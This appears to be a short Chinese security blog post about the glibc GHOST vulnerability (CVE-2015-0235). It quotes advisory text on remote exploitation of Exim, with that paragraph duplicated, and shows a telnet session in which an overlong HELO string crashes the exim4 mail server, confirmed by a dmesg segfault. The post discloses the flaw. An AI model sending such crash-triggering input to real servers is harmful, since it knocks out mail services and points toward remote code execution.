CVE-2015-0235 GNU glibc 的各种 Exploit 快要涌现了

猪猪侠 | 2015-01-28 16:46

The Exim mail server is exploitable remotely if configured to perform

extra security checks on the HELO and EHLO commands ("helo_verify_hosts"

or "helo_try_verify_hosts" option, or "verify = helo" ACL); we developed

a reliable and fully-functional exploit that bypasses all existing

protections (ASLR, PIE, NX) on 32-bit and 64-bit machines.

The Exim mail server is exploitable remotely if configured to perform

extra security checks on the HELO and EHLO commands ("helo_verify_hosts"

or "helo_try_verify_hosts" option, or "verify = helo" ACL);

user@...ian-7-7-64b:~$ telnet 127.0.0.1 25

Trying 127.0.0.1...

Connected to 127.0.0.1.

Escape character is '^]'.

220 debian-7-7-64b ESMTP Exim 4.80 ...

HELO 00000000000000000000000000000000000000000000000...

Connection closed by foreign host.

user@...ian-7-7-64b:~$ dmesg

...

[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]